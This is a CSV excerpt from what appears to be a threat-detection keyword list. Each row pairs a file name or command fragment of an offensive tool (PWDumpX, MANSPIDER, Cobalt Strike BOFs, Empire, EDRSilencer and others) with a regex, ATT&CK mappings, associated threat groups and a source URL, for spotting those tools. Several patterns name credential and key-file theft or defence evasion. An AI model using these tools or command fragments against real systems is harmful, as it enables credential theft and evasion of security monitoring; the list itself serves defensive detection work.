"* DumpSvc.exe*",".{0,1000}\sDumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","1005"
"* duplicates.nse*",".{0,1000}\sduplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1006"
"* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","1007"
"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *",".{0,1000}\s\-e\sbat\scom\svbs\sps1\spsd1\spsm1\spem\skey\srsa\spub\sreg\stxt\scfg\sconf\sconfig\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1008"
"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *",".{0,1000}\s\-e\spfx\sp12\spkcs12\spem\skey\scrt\scer\scsr\sjks\skeystore\skey\skeys\sder\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1009"
"* -e ppk rsa pem ssh rsa*",".{0,1000}\s\-e\sppk\srsa\spem\sssh\srsa.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1010"
"* -e shinject -r -E -t *",".{0,1000}\s\-e\sshinject\s\-r\s\-E\s\-t\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1011"
"* e2e_test.py*",".{0,1000}\se2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1012"
"* eap-info.nse*",".{0,1000}\seap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1013"
"* EASSniper.ps1*",".{0,1000}\sEASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","1014"
"* EASSniper.ps1*",".{0,1000}\sEASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","1015"
"* eas-valid-users.txt*",".{0,1000}\seas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","1016"
"* ebapc_injection.exe*",".{0,1000}\sebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1017"
"* ebowla.py*",".{0,1000}\sebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","1018"
"* ecrprivenum.py*",".{0,1000}\secrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1020"
"* ecrpubenum.py*",".{0,1000}\secrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1021"
"* edge logindata *",".{0,1000}\sedge\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","1022"
"* edge masterkey *",".{0,1000}\sedge\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","1023"
"* EdgeDump.ahk*",".{0,1000}\sEdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1024"
"* ediH:edoMwodniWwohS-*",".{0,1000}\sediH\:edoMwodniWwohS\-.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","1025"
"* edraser.py*",".{0,1000}\sedraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","1026"
"* EDRSilencer.c*",".{0,1000}\sEDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","1027"
"* EfiDSEFix.cpp*",".{0,1000}\sEfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","1028"
"* EfsPotato*",".{0,1000}\sEfsPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1029"
"* Egress-Assess's FTP server*",".{0,1000}\sEgress\-Assess\'s\sFTP\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","1030"
"* -ElevatedPersistenceOption *",".{0,1000}\s\-ElevatedPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1031"
"* emailall.py*",".{0,1000}\semailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","1032"
"* empire.arguments*",".{0,1000}\sempire\.arguments.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1033"
"* empire.client.*",".{0,1000}\sempire\.client\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1034"
"* empire.py*",".{0,1000}\sempire\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1035"
"* empire_exec*",".{0,1000}\sempire_exec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1036"
"* empireadmin*",".{0,1000}\sempireadmin.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1037"
"* enable_all_tokens.exe*",".{0,1000}\senable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1038"
"* EnableAllMacros_AMSI.py*",".{0,1000}\sEnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1039"
"* EnableAllMacros_AMSI.vba*",".{0,1000}\sEnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1040"
"* EnableAllTokenPrivs.exe*",".{0,1000}\sEnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","1041"
"* EnableAllTokenPrivs.ps1*",".{0,1000}\sEnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","1042"
"* -enabled -u * -p * -old-bloodhound*",".{0,1000}\s\-enabled\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1043"
"* -encrypt * -process * -sandbox *",".{0,1000}\s\-encrypt\s.{0,1000}\s\-process\s.{0,1000}\s\-sandbox\s.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","1044"
"* encrypthub_steal.ps1*",".{0,1000}\sencrypthub_steal\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","1045"
